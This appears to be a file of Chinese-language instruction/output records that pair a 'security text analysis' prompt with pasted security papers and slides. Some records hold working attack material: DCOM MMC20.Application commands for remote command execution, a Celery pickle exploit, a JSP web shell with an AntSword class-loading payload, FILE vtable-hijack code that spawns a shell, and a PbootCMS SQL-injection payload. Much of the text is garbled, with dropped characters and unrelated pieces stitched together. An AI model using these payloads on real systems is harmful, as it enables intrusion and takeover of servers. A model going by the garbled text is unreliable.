笔者这里只是简单里描述关键概念Microsoft 为了实现跨机器跨语言跨平台跨进程 COM的内容非常之复杂 对DCOM有了一个了解下面的测试过程可以概括为利用DCOM 远程调用COM组件执行命令 Execution MMC20.Application COM class 存储在注册表中 和目标建立连接 通过DCOM对象在受害者系统上执行命令 仅演示既然能执行cmd就能执行其他命令反弹shell存活探测等等 不要局限演示例如在Cobalt Strike beacon 中执行命令等等 Get-ChildItem 'registry::HKEY_CLASSES_ROOT\\WOW6432Node\\CLSID\\{49B2791A-B1AE- 4C90-9B8E-E860BA07F889}' $a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application. 1\",\"192.168.3.142\")) $a.Document.ActiveView.ExecuteShellCommand(\"cmd\",$null,\"/c hostname > c:\\Hostname.txt\",\"7\") Observations 先看下整个执行命令过程发生的日志 使用ProcessMonitor 查看下进程详情 mmc.exe 的父进程是 svchost.exe ,在TCP/IP 菜单中可以查看到 PC-jerry-0day 向 OWA2010SP3 建立的 连接 使用ProcessMonitor 查看 \"mmc.exe\"启动过程中的调用 stack堆栈调用了 rpcrt4.dll : 小结 使用DCOM横向的方法还有很多文章的原作者写了几篇关于DCOM 横向的有机会在学习吧可能 我们用的最多的是 impacket 中的dcomexec ,原理上有所不同具体哪里不同笔者也说不上来如果 有知道的师傅请指教唯一注意的点需要管理权限 参考 View::ExecuteShellCommand method LATERAL MOVEMENT USING THE MMC20.APPLICATION COM OBJECT GetTypeFromCLSID(Guid, String) COM Technical Ov", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Celery <4.0 Redis unauthorized access + Pickle deserialization exploit [中文版本(Chinese version)](./README.zh-cn.md) Celery is a simple, flexible, and reliable distributed system that processes a large number of messages while providing the tools needed to operate and maintain such a system. It is a task queue focused on real-time processing and also supports task scheduling. In Celery <4.0 version, Pickle is used by default for serialized task messages. When the queue servicee.g. Redis/RabbitMQ/RocketMQ  used has an unauthorized access problem, the Pickle deserialization vulnerability can be used to execute arbitrary code. ## Vulnerability Environment Execute the following command to start Celery 3.1.23 + Redis: ```bash docker compose up -d ``` ## Exploit The exploit script `exploit.py` only supports use under python3 ```bash pip install redis python exploit.py [Host IP] ``` View Results ``` docker compose logs celery ``` You can see the following task message error ![](a.png) ```bash docker compose exec celery ls -l /tmp ``` You can see that the file `celery_success` was successfully created ![](b.png) ## Reference https://docs.celeryproject.org/en/stable/userguide/configuration.html https://www.bookstack.cn/read/celery-3.1.7-zh/8d5b10e3439dbe1f.md#dhfmrk https://docs.celeryproject.org/en/stable/userguide/calling.html#serializers https://www.jianshu.com/p/52552c075bc0 https://www.runoob.com/w3cnote/python-redis-intro.html https://blog.csdn.net/SKI_12/article/details/85015803", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 新型句话连接原有句话 @yzddMr6 1.jsp Payload 密码test 1 <%@ page import=\"javax.script.ScriptEngineManager\" %> 2 <%@ page import=\"javax.script.ScriptEngine\" %><% 3 try { 4 ScriptEngine engine = new ScriptEngineManager().getEngine ByName(\"js\"); 5 engine.put(\"request\", request); 6 engine.put(\"response\", response); 7 engine.eval(request.getParameter(\"mr6\")); 8 } catch (Exception e) { 9 System.out.println(\"error: \"+e);; 10 } 11 %> 1 try { 2 load(\"nashorn:mozilla_compat.js\"); 3 } catch (e) {} 4 importPackage(Packages.java.util); 5 importPackage(Packages.java.lang); 6 importPackage(Packages.java.io); 7 var output = new StringBuffer(\"\"); 8 var cs = \"UTF-8\"; 9 response.setContentType(\"text/html\"); 10 request.setCharacterEncoding(cs); 11 response.setCharacterEncoding(cs); 12 function Base64DecodeToByte(str) { 13 importPackage(Packages.sun.misc); 14 importPackage(Packages.java.util); 15 var bt; 2 添加到蚁剑参数 16 try { 17 bt = new BASE64Decoder().decodeBuffer(str); 18 } catch (e) { 19 bt = new Base64().getDecoder().decode(str); 20 } 21 return bt; 22 } 23 function defineShell(cls) { 24 var payload = Base64DecodeToByte(cls); 25 var loader = Thread.currentThread().getContextClassLoader(); 26 var byteArray = Java.type(\"byte[]\"); 27 var int = Java.type(\"int\"); 28 var defineMethod = java.lang.ClassLoader.class.getDeclaredMetho d( 29 \"defineClass\", 30 byteArray.class, 31 int.class, 32 int.class 33 ); 34 defineMethod.setAccessible(true); 35 var constructor = 36 java.security.SecureClassLoader.class.getDeclaredConstructor( 37 ClassLoader.class 38 ); 39 constructor.setAccessible(true); 40 var cl = constructor.newInstance(loader); 41 var c = defineMethod.invoke(cl, payload, 0, payload.length); 42 c.newInstance().equals(request); 43 } 44 defineShell(request.getParameter(\"test\")); 3 修改密码为test使原有类型连接连接成功 可以使As-Exploits插件所有功能 4", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAuditing 6LoWPAN Networks using Standard Penetration Testing Tools Adam Reziouk Airbus Defence and Space adam.reziouk@airbus.com Arnaud Lebrun Airbus Defence and Space arnaud.lebrun@airbus.com Jonathan-Christofer Demay Airbus Defence and Space jcdemay@airbus.com ABSTRACT The Internet of Things is expected to be involved in the near future in all major aspects of our modern society. On that front, we argue that 6LoWPAN is a protocol that will be a dominant player as it is the only IoT-capable protocol that brings a full IP stack to the smallest devices. As evidence of this, we can highlight the fact that even the latest ZigBee Smart Energy standard is based on ZigBee IP which itself relies on 6LoWPAN, a competitor of the initial ZigBee protocol. Efficient IP-based penetration testing tools have been available to security auditors for years now. However, it is not that easy to use them in the context of a 6LoWPAN network since you need to be able to join it first. In fact, the difficult part is to associate with the underlying IEEE 802.15.4 infrastructure. Indeed, this standard already has two iterations since its release in 2003 and it provides with several possibilities regarding network topology, data transfer model and security suite. Unfortunately, there is no off-the-shelf component that provides, out of the box, with such a wide range of capabilities. Worst still, some of them deviate from the standard and can only communicate with components from the same manufacturer. In this paper, we present the ARSEN project: Advanced Routing for 6LoWPAN and Ethernet Networks. It provides security auditors with two new tools. First, a radio scanner that is capable of identifying IEEE 802.15.4 networks and their specificities, including several deviations from the standard that we encountered in actual security audits. Secondly, a border router capable of routing IPv6 frames between Ethernet and 6LoWPAN networks while adapting to the specificities identified by the scanner.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### 伪造vtable劫持程序流程简介 前面我们介绍了Linux中文件流的特性FILE我们可以得知Linux中的一些常见的IO操作函数都需要经过FILE结构进行处理尤其是_IO_FILE_plus结构中存在vtable一些函数会取出vtable中的指针进行调用 因此伪造vtable劫持程序流程的中心思想就是针对_IO_FILE_plus的vtable动手脚通过把vtable指向我们控制的内存并在其中布置函数指针来实现 因此vtable劫持分为两种一种是直接改写vtable中的函数指针通过任意地址写就可以实现另一种是覆盖vtable的指针指向我们控制的内存然后在其中布置函数指针 ### 伪造vtable劫持程序实践 这里演示了修改vtable中的指针首先需要知道_IO_FILE_plus位于哪里对于fopen的情况下是位于堆内存对于stdin\\stdout\\stderr是位于libc.so中 ``` int main(void) { FILE *fp; long long *vtable_ptr; fp=fopen(\"123.txt\",\"rw\"); vtable_ptr=*(long long*)((long long)fp+0xd8); //get vtable vtable_ptr[7]=0x41414141 //xsputn printf(\"call 0x41414141\"); } ``` 根据vtable在_IO_FILE_plus的偏移得到vtable的地址在64位系统下偏移是0xd8之后需要搞清楚欲劫持的IO函数会调用vtable中的哪个函数关于IO函数调用vtable的情况已经在FILE结构介绍一节给出了知道了printf会调用vtable中的xsputn并且xsputn的是vtable中第八项之后就可以写入这个指针进行劫持 并且在xsputn等vtable函数进行调用时传入的第一个参数其实是对应的_IO_FILE_plus地址比如这例子调用printf传递给vtable的第一个参数就是_IO_2_1_stdout_的地址 利用这点可以实现给劫持的vtable函数传參比如 ``` #define system_ptr 0x7ffff7a52390; int main(void) { FILE *fp; long long *vtable_ptr; fp=fopen(\"123.txt\",\"rw\"); vtable_ptr=*(long long*)((long long)fp+0xd8); //get vtable memcopy(fp,\"sh\",3); vtable_ptr[7]=system_ptr //xsputn fwrite(\"hi\",2,1,fp); } ``` 但是在目前libc2.23版本下位于libc数据段的vtable是不可以进行写入的不过通过在可控的内存中伪造vtable的方法依然可以实现利用 ``` #define system_ptr 0x7ffff7a52390; int main(void) { FILE *fp; long long *vtable_addr,*fake_vtable; fp=fopen(\"123.txt\",\"rw\"); fake_vtable=malloc(0x40); vtable_addr=(long long *)((long long)fp+0xd8); //vtable offset vtable_addr[0]=(long long)fake_vtable; memcpy(fp,\"sh\",3); fake_vtable[7]=system_ptr; //xsputn fwrite(\"hi\",2,1,fp); } ``` 我们首先分配一款内存来存放伪造的vtable之后修改_IO_FILE_plus的vtable指针指向这块内存因为vtable中的指针我们放置的是system函数的地址因此需要传递参数\"/bin/sh\"或\"sh\" 因为vtable中的函数调用时会把对应的_IO_FILE_plus指针作为第一个参数传递因此这里我们把\"sh\"写入_IO_FILE_plus头部之后对fwrite的调用就会经过我们伪造的vtable执行system(\"sh\") 同样如果程序中不存在fopen等函数创建的_IO_FILE时也可以选择stdin\\stdout\\stderr等位于libc.so中的_IO_FILE这些流在printf\\scanf等函数中就会被使用到在libc2.23之前这些vtable是可以写入并且不存在其他检测的 ``` print &_IO_2_1_stdin_ $2 = (struct _IO_FILE_plus *) 0x7ffff7dd18e0", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nXploiting Google Gadgets: Gmalware and Beyond Robert Hansen Tom Stracener DRAFT: Complete slides will be made available after our talk. The Dark Side of Gadgets Complete slides will be made available after the our talk on August 8th. Xploiting Google Gadgets: Gmalware and Beyond Tom Stracener & Robert Hansen (Rsnake) If todays malware mostly runs on Windows because its the commonest executable platform, tomorrows will likely run on the Web, for the very same reason. Because, like it or not, Web is already a huge executable platform, and we should start thinking at it this way, from a security perspective. PDP, Architect, GNUCITIZEN, quoting Giorgio Maone XSS hole in gmodules.com Vulnerability documented by Rsnake in 2007 http://ha.ckers.org/blog/20070817/xss-hole-in-google-apps-is- expected-behavior/ XSS was never fixed and is never going to be fixed Rsnake reported the vulnerability to Google and finally Disclosed its existence to the public after dialog with google Those of you that havent read Rnsakes blog are probably wondering why? Cross-Site Scripting is a serious vulnerability, so why was it ignored? XSS So what? Execute arbitrary code Use javascript and HTML to craft custom payloads Content Spoofing Make users believe that content is legitimate when in fact it is controlled by an attacker with malicious intent. Phishing Steal user passwords by faking login portals to web- based services, devices, or web sites. Arbitrary Javascript executes whenever the user follows a link to the gadget or if the gadget is embedded within a web page. XSS is Expected Behavior Googles Argument (one line) We need javascript, we cant turn it off, so arbitrary execution of javascript is part of the expected behavior On further review, it turns out that this is not a bug, but instead the expected behavior of this domain. Javascript is a supported part of Google modules, as seen, for example, here: http://www.google.com/apis/maps/documentation/mapplets/#Hello_World_of_Mapplets. Sinc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBreaking Forensics Software: Weaknesses in Critical Evidence Collection Tim Newsham - <tim[at]isecpartners[dot]com> Chris Palmer - <chris[at]isecpartners[dot]com> Alex Stamos - <alex[at]isecpartners[dot]com> iSEC Partners, Inc 115 Sansome Street, Suite 1005 San Francisco, CA 94104 http://www.isecpartners.com July 1, 2007 Abstract This article presents specific vulnerabilities in common forensics tools that were not previously known to the public. It discusses security analysis techniques for finding vulnerabilities in forensic software, and suggests additional security-specific acceptance criteria for consumers of these products and their forensic output. Traditional testing of forensics software has focused on robustness against data hiding techniques and accurate reproduction of evidence. This article argues that more security focused testing, such as that performed against security-sensitive commercial software, is warranted when dealing with such critical products. Note: Due to the deadline for submitting presentation materials to Black Hat and the ongoing nature of our conversation with Guidance Software, we are unable to present in this revision of the paper all the details of the defects in EnCase that we found. By the time you read this, this version of the paper will be out of date and the canonical version may have the defect details. Please see https: // www. isecpartners. com/ blackhat to find the most recent version of this paper as well as several of the tools we created during our research. 1 Introduction This article presents specific vulnerabilities in common forensics tools that were not previously known to the public, discusses techniques for finding vulnerabilities in forensic software, and recommends additional security-specific acceptance criteria buyers should apply. The primary contribution of this work is to take an adversarial look at forensics software and apply fuzzing and vulnerability assessment common to analysis of other products, such as op", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nmaking fun of your malware Defcon 17 Matt Richard and Michael Ligh Following the presentation at Defcon 17, you can find the final slides here: http://code.google.com/p/mhl-malware-scripts/Defcon2009_MakingFun.pdf Silent Banker author forgets to seed the PRNG Honey, I Shrunk the Entropy! Off to a bad start Zeus, September 2007 PRNG used to avoid hash-based detection Silent Banker, Feburary 2008 PRNG used to generate temporary file names Recipe for disaster - step 1 Silent Banker, July 2008 PRNG used to generate encryption key Recipe for disaster 1. Seed the PRNG 2. Generate 16 byte key with 1000 calls to rand() 3. Generate 8 byte number from 16 byte key 4. Generate another 8 byte number from the first 8 byte number and secd value from INI configuration file 5. Explode the second 8 byte number into 32 bytes 6. Encrypt stolen data with original 16 byte key from step 2 7. Send the exploded 32 byte number along with stolen data Recipe to exploit the disaster 1. Seed the PRNG TO ZERO 2. Generate 16 byte key with 1000 calls to rand() 3. Generate 8 byte number from 16 byte key 4. Generate another 8 byte number from the first 8 byte number and secd value from INI configuration file 5. Explode the second 8 byte number into 32 bytes 6. Encrypt stolen data with original 16 byte key from step 2 7. Send the exploded 32 byte number along with stolen data Disaster recovery The one that got away Torpig installs MBR rootkit to get a DLL Injected into user-mode programs I created a hyper cool MBR rootkit and all I got was this old trojan DLL The nasty side The funny side The nice side Attackers trojan defaults to xor due to invalid size DES key To DES or not to DES? Always make backups! xor backup method How to shoot yourself in the foot MSDN to the rescue Conficker.Bs flawed IP generator only scans a portion of the Internet Honey, sorry to bother you again, I shrunk the Internet The flawed method Whats the big deal? 1. Excludes multicast, private, broadcast, etc 2. Excludes IPs on b", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n精简版 SDL 落地实践 Author:@好好学习英语的 abc 前言 一般安全都属于运维部下面和上家公司的运维总监聊过几次一些日常安全工 作能不能融入到 DevOps 中没多久因为各种原因离职18 年入职 5 月一家第 三方支付公司前半年在各种检查中度过监管形势严峻加上大领导对安全的 重视(主要还是监管)所有部门 19 年的目标都和安全挂钩由于支付公司需要 面对各种监管机构的检查部分安全做的比较完善经过近一年对公司的熟悉 发现应用安全方面比较薄弱这部分业内比较好的解决方案就是 SDL和各厂 商交流过之后决定自己照葫芦画瓢在公司一点一点推广 一精简版 SDL 上图为标准版的 SDL,由于运维采用 DevOps 体系测试也使用自动化进行 功能测试版本迭代周期比较快,安全人手不足加上对 SDL 的威胁建模等方 法也一头雾水如果把安全在加入整个流程会严重影响交付时间在这种 情况调研了一些业内的一些做法决定把 SDL 精简化 精简版 SDL 如 下 二精简版 SDL 落地实践 1 安全培训 SDL 核心之一就是安全培训所以在安全培训上我们做了安全编码 安全 培训 安全 需求 设计 开发 实现 验证 发布 监控 安全意识安全知识库安全 SDK 1.1 安全编码 我们在网上找了一些 java 安全编码规范产品安全设计及开发安全 规范结合公司实际业务出了一版 因为各种监管机构对培训都有要求借此推了一下安全培训定期对 开发和新员工入职的培训 1.2 安全意识 公司有企业微信公众号大部分员工都关注了在公众号推广了一波 宣传完之后答题答题满分送小礼品 因为人手不足而功能测试和安全测试本质上有很多相通的地方测试部 门也比较配合针对测试人员做了一些安全测试相关的培训但是效果并不是太理 想 1.3 安全知识库 在漏洞修复过程中开发很多不太了解漏洞原理修复方案所以我 们建立了安全知识库开发先到安全知识库查相关解决方法找不到 的再和安全人员沟通安全人员对知识库不断更新形成一个闭环 1.4 安全 SDK 由于公司有架构部门开发框架基本是架构部门提供我们将一些 常 见 的 漏 洞 和 架 构 部 门 沟 通 之 后  让 架 构 将 一 些 漏 洞 修 复 方 式 用 SDK 实现开发只需要导入 JAR 包在配置文件中配置即可其中 也挺多坑的需要慢慢优化 2 安全需求设计 公司有项目立项系统所有的项目立项都需要通过系统来进行立项 安全为必选项评审会安全也必须要参与 这个时候基本上项目经理会找安全人员进行沟通copy 了一份 VIP 的产品安全设计规范根据需求文档和项目经理确定安全需求 确认好安全需求之后将按需求加入到需求文档并确认安全测试时 间此流程只针对新项目已经上线的项目的需求并未按照此流程 后续在安全测试时候会讲到这部分的项目是怎么做的 三开发安全测试 安全测试主要分为代码审计漏洞扫描手工安全测试由此衍生出 来 的 安 全 产 品 分 为 3 类  DAST  动 态 应 用 程 序 安 全 测 试  wvs,appscan  SAST  静 态 应 用 程 序 安 全 测 试 (fortify,rips)IAST交互式应用程序安全测试 seeker雳 鉴  , 这 三 种 产 品 的 详 细 介 绍 可 以 参 考 https://www.aqniu.com/learn/46910.html,下图为三种产品 的测试结果对比 这几类产品实现了自动化可以继承到 DevOps 中接下来我们将这些 工具融入到开发测试阶段 IAST 的实现模式较多常见的有代理模式VPN流量镜像插桩模 式本文介绍最具代表性的 2 种模式代理模式和插桩模式一些调 研过的产品如下图具体测试结果就不公布了 2.1 开发阶段 在对几类产品调研的时候发现 IAST 的插桩模式可以直接放到开发环 境开发环境和测试环境的代码区别主要还是在于 application.yml 配置文 件所以可以提前将该模式放到开发阶段 开发写完代码提交到 gitlab 部署到开发环境启动应用的时候开发 需要验证一下功能是否可用这个时候就可以检测出是否存在漏洞 公司在测试环境使用 rancher把 IAST 的 jar 包放入到项目的 gitlab,在部署的时候把代码拉到本地通过修改 Dockerfile 文件把 jar 包添加到容器  ADD shell/xxx.jar /home/app/xx/lib 由于公司项目基本统一使用 spring-boot所有的项目都通过一个 start.sh 脚本来启动应用start.sh 和 Dockerfile 一样需要添加到项 目的 gitlab同时修改 start.sh 脚本文件即可 -javaagent:$APP_HOME/lib/xx.jar -jar $APP_HOM", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCaffeine Monkey: Automated Collection, Detection and nalysis of Malicious JavaScript A Ben Feinstein, CISSP Daniel Peck {bfeinstein, dpeck}@secureworks.com SecureWorks, Inc. Introduction In recent years, the web browser has likely become the single most ubiquitous computing application. Web browsers can be found everywhere, from being embedded in video game consoles and handheld devices to being installed on large servers supporting the enterprise. As with any widely deployed type of software, web browsers have become an increasingly popular target for attack. This trend will only continue. Todays browsers represent a complex application stack foisted atop the Operating Systems (OS) stack. Putting aside the complexity of achieving robust, crossbrowser compatibility, web developers are essentially coding to the browsers stack, with the goal of portability across both browsers and OS platforms. The growth in popularity of Web 2.0 sites that leverage the most advanced capabilities of the browser stack has contributed to blurring the distinction between data and executable code. This is especially apparent when considering support for dynamically interpreted scripting, in particular JavaScript. Due to the nature of dynamic script interpretation in the browser, it is difficult for many widely adopted security technologies to mitigate the clientside browser attack vector. In our research, we examined the current state of JavaScript obfuscation and evasion techniques, approaches for collecting JavaScript samples from the wild, and methods for analyzing the collected scripts. We developed a suite of tools for collecting and indexing JavaScript, interpreting the scripting in a sandboxed environment, and performing functional analysis for manual, as well as automated detection mechanisms. At the outset, we believed that investigating new approaches was warranted. Current methods tend to fall into two large categories: fully automated client honeypot systems or manual human an", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMac OS X Server File Services Administration For Version 10.3 or Later 034-2346_Cvr 9/12/03 10:24 AM Page 1  Apple Computer, Inc.  2003 Apple Computer, Inc. All rights reserved. The owner or authorized user of a valid copy of Mac OS X Server software may reproduce this publication for the purpose of learning to use such software. No part of this publication may be reproduced or transmitted for commercial purposes, such as selling copies of this publication or for providing paid-for support services. The Apple logo is a trademark of Apple Computer, Inc., registered in the U.S. and other countries. Use of the keyboard Apple logo (Option-Shift-K) for commercial purposes without the prior written consent of Apple may constitute trademark infringement and unfair competition in violation of federal and state laws. Apple, the Apple logo, AppleScript, AppleShare, AppleTalk, ColorSync, FireWire, Keychain, Mac, Macintosh, Power Macintosh, QuickTime, Sherlock, and WebObjects are trademarks of Apple Computer, Inc., registered in the U.S. and other countries. AirPort, Extensions Manager, Finder, iMac, and Power Mac are trademarks of Apple Computer, Inc. Adobe and PostScript are trademarks of Adobe Systems Incorporated. Java and all Java-based trademarks and logos are trademarks or registered trademarks of Sun Microsystems, Inc. in the U.S. and other countries. 19952001 The Apache Group. All rights reserved. UNIX is a registered trademark in the United States and other countries, licensed exclusively through X/Open Company, Ltd. 034-2346/09-20-03 LL2346.Book Page 2 Friday, August 22, 2003 2:38 PM 3 1 Contents Chapter 1 9 About File Services 9 Overview 10 Privileges 11 Explicit Privileges 11 The User Categories Owner, Group, and Everyone 12 Hierarchy of Privileges 12 Client Users and Privileges 12 Privileges in the Mac OS X Environment 13 Customizing the Mac OS X Network Globe 13 Share Points in the Network Globe 13 Adding System Resources to the Network Library Folder 14 Security", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# X-Day威胁分析与对战技巧 ## 目录 [TOC] ## 流行APT手法分析与APT29档案解密 ### solarwinds 供应链分析 - 3月Prodaft瑞士安全公司对solarwinds进行事件分析溯源 - 供应链攻击流程 - msbuild注入 - 感染后会进行目标监听判断高价值目标 - 谷歌整理的供应链攻击流程分析图 - developer-source-build-package-dependency-use ### 关于APT29 #### 组织能力 - 钻石模型 - 攻击者 - 毛熊背景 - 受害者 - 基础设施 - 攻击者攻陷毛熊特点私有资产第三方平台 - 能力 - 金字塔模型描述能力等级 #### 攻击事件 - 经典攻击事件 - 2016 对DNC机构的攻击 - 2020 对疫苗研制机构的攻击 - 非常规事件 - 2014Tor网络出口节点劫持 - 2015 黑产类的大规模鱼叉邮件攻击 - 黑产团伙大规模进行钓鱼邮件攻击来收割机肉鸡 #### 组织结构划分 - The Dukes - WillMess - Nobelium ### APT29归因分析 - APT命名是为了便于划分某一类具有相似之处的黑客组织 - 并不严格代表团伙和人员的边界有一个服务多个的情况 - 事件归因是基于**当前积累和理解**向已知组织作出的合理挂靠 #### The Dukes归因 - 特点 - 组件中包含推特 - 使用隐写技术写入图片 - 第一步受害者分析 - 时间线上的攻击活动调查 - 目标以美国为主的北约成员国相关 - 第二步特马编译时间时区 - 对比编译时间和正常工作时间的时区 - 第三步查看美国情报机构的线索 - 是否有与事件相关的IP地址等IOC #### WellMes归因 - 攻击流程与国内红队相似 - 单点渗透 - 横向 - 投递特马 --- - 第一步SeaDuke&Wellmess流量分析 - Cookie中包含SeaDuke&Wellmess的加密特征 - 第二步Subburst&Kazaur特马分析卡巴斯基 - 木马上线延时-休眠时间算法 - API Hash摘要 - PC UID标识序列生成算法 --- - 通过已有的海量恶意样本库满足上述算法指纹的进行归因 - 第三步ProdaftSilverFish调查报告 - 从FireEye披露的资产出发 - 攻击阶段的DNS解析 - 发现DNS服务器上有2304有PowerMTA服务 - 基于上述特征对全球IP进行测绘过滤无关站点 - 发现特定IP后 进行同C段主机排查 - 发现另IP上存在意思木马主控端后台的登入页面**与黑产的资产类型有相同之处** - 爆破登入木马主控端后台 - 第四步CC后台源代码中的携带的开发者CID - 进行OSINT搜集发现与毛熊的地下技术交流论坛有关联 - 第五步发现后台中存在俄语俚语和常用语的字符片段 - 第六步在后台中源代码中发现流量重定向的代码过滤 - 过滤毛熊联邦相关的 - 重点关注枫叶国美丽国 - 第七步CC后台操作行为活跃的事件区段 - 分析日志信息的时间段对应正常工作时间段的时区 --- - 注意点 - 对IOC调查会发现存在不同团伙使用相同IOC的情况 - 要保持质疑的态度 --- - 理论与现实 - 指导理论 - Killchain - 钻石模型 - TTPs - ATT&CK - 实际情况 - ATT&CK半自动化落地问题 - 攻击上下文数据缺失 - TTPs关联的论证 - 用TTPs关联时一定要是独一无二的 - 以人为主导的组织关联局限性 --- - 组织关联分析总结 - 受害者分析 - 国家地域 - 特定行业 - 时政分析 - 攻击资产 - 武器库 - 特马 - 攻击样本溯源 - 网络资产 - 私有资产 - 第三方资产 - TTPs - 攻击战术偏好 - 载荷执行流程 - **单点指纹** - 要有足够的特殊性 - e.g. 图拉的加密算法会分层每一步骤不同 - e.g. 特马对真实环境的判断会对不同的检查点给分在一定阈值或者水平线上进行判断 - 反制溯源 ![image-20210725201820674](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/image-20210725201820674.png) 图组织关联分析图 --- - 数据拓线 - 失陷现场 - 上机取证 - 同环境排查 - 样本层 - 样本属性 - 签名 - 元素据 - 特殊事件 - 代码指纹 - 网络层 - 传输数据加密协议 - Domain特征 - e.g. 频繁出现的某些特定字段 - IP特征 - 判断是否为私有资产如果是则关联的域名等也大概率归攻击者 -", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n如何成為駭客 剛剛那些駭客的朋友 GD 駭客 Roadmap 如何成為駭客  好奇心 feeling everything be interesting  持續學習 spend a lot time on new tricks  習慣踏出舒適圈  專注力 research, go after one goal for a long while  需要滿多運氣沒有也別灰心  有耐心 不要柿子挑軟的  創意 thinking out-of-the-box  形成駭客的直覺 當興趣或工作 有能力之後的選擇 Cleverness is a gift, Skillz can be learned, Kindness is a choice.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPbootCMS<=3.1.2前台注分析 写在前 这次学校联合oppo办了场校赛我出了些RealWorld向的赛题由于这个不是最新版 本再加上思路还是很骚中间是有些坑的导致前台注法获取表名接下来我会抽 丝剥茧点点分析相信师傅们定能学到东西滴其他的题则不那么适合分享(坏笑) 这以mysql数据库为例sqlite同理只是payload稍作改变 正 出题的初衷是希望学弟们能学会通过学会diff去快速获得漏洞并利可惜最终只有两个队 伍做出来了其中个预期是开发没有修复个远古的注导致新版本也能这主要 分享我的预期以及些踩坑和bypass先可以看到这的修复通过描述可以猜测可能是前 台的 通过beyondCompare简单对发现这尤其有点可疑再加上在次件默认路 由 apps/home/controller/IndexController.php 下的 empty 函数会控制路由转发就 可以确定确实是这的问题通过分析发现此漏洞触发点在第120的 $this->model- >getSort($path) 由于path变量可控最终在 apps/home/model/ParserModel.php 下 getSort 函数处可造成注 既然确定了那就继续深看看先不是pathinfo穿参模式则进下的分,当然默认情况下 不是采pathinfo模式,会获取 QUERY_STRING 也就是get传参 ? 后部分的内容保存到 qs 变量 当中接下来通过 parse_str 做变量的赋值保存到 output 当中这是坑后会说到如何破 局之后会把参数的key保存给path变量 接下来 / 做分隔符之后switch case取第个元素作为分发的条件 我们需要进default分才能到漏洞点这我们随便个字符串 test http://127.0.0.1/?test 成功到漏洞点getSort简简单单过滤拼接查询 为了便这布尔盲注了回显的又臭又长 踩坑 可是当我们彩烈的去构造注的时候 ?test/3' or if(0,0,1))%23 可以看到这空 格都被替换成 _ 了在这你可能会告诉我为什么你不 %0a/%09 又或者 /**/ 去绕过 呢这不是明摆着呢但是你说 information_schema.xxx 怎么办parse_str仍然会将 . 替 换为 _ 在解决问题之前我先给出payload ?test/3'/*[*/or if(1,0,1))%23 毕竟这篇章还 得继续 我们可以通过控制if的判断 1 or 0 如果是0代表没有结果页也会报错根据这个特征我们 就可以写简简单单的布尔盲注的脚本了 看php内核代码破局 还记得那个parse_str函数么虽然可以句话概括也就是上常说的 parse_str 只有 第个 [ 会被替换为 _ 那么为什么论加多少个空格都会被替换为 _ 当然也不扯远了只 是想谈谈为什么 那么我就来教教家如何绕过这我也不想通篇写整个步骤这个函数咋解析的然后又传 到哪去感兴趣的师傅可以编译 直接放结果在 main\\php_variables.c 下这个函数已经明显的告诉了我们结果就不 必多说了 如果有空格或者 . 就会被for循环限替换为 _ 那么重点来了有什么办法打破这个循环答案就是使个 [ 那么这再留两个问题 为什么出现 [ 也给替换掉了在php设计的时候为什么会认为出现 [ 就终了呢我们知道在 输的时候什么情况下会出现也就是数组继续回到话题 在这php会认为你解析到了数组给p为当前指针指向的变量名地址并把当前指针指向 赋值为0接下来来揭晓答案 这因为没有 ] 进匹配这可能php认为是误输所以把指针指向前位赋值为 _ 这 也就解释清楚了 同时你也应该知道了为什么 [[只将第个[解析为_第个不解析了吗以及[.[空格等多种 操作 结果 简单通过分法即可获得flag", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTraps of Gold Michael Brooks & Andrew Wilson Cau.on. Please vet anything discussed with legal and management. FRUSTRATION http://www.flickr.com/photos/14511253@N04/4411497087/sizes/o/in/photostream/ Our en.re defense strategy is REACTIVE AKA, losing Fixes known issues Someone already pwnd it Already in Produc@on! Patch Management Reduces Vulnerabili@es Expensive Limited Effec@veness Secure Development Free groping at airport You arent safer Introduces vulnerabili@es Security Theater What is missing? But if they arent working Fight Back http://www.flickr.com/photos/superwebdeveloper/5604789818/ sizes/l/in/photostream/  We conclude that there exists no clear division between the offense and defense. - USMC, Warfigh.ng w.flickr.com/photos/travis_simon/ 3/sizes/z/in/photostream/ They have: AUackers are human too.  Finite @me  Imperfect tools  Emo@on / Ego / Bias  Risk AUack them there. So...  If I have seen further, it is only by standing on the shoulder of giants. - Sir Isaac Newton Traps of Gold IDS Systems Honeypots Exploits Attrition Maneuver Two Models of Warfare Maneuverability http://www.flickr.com/photos/travis_simon/ 3865383863/sizes/z/in/photostream/ Stack the Deck http://www.flickr.com/photos/jonathanrh/5817317551/sizes/o/in/photostream/  To act in such a way that the enemy does not know what to expect. Ambiguity: Ambiguity Server Banners File Extensions Default Files Who needs this? The browser doesnt care. Why leave these up? Shut up. If knowing is half the baUle  Convince the enemy we are going to do something other than what we are really going to do Decep.on Lie about the rest. 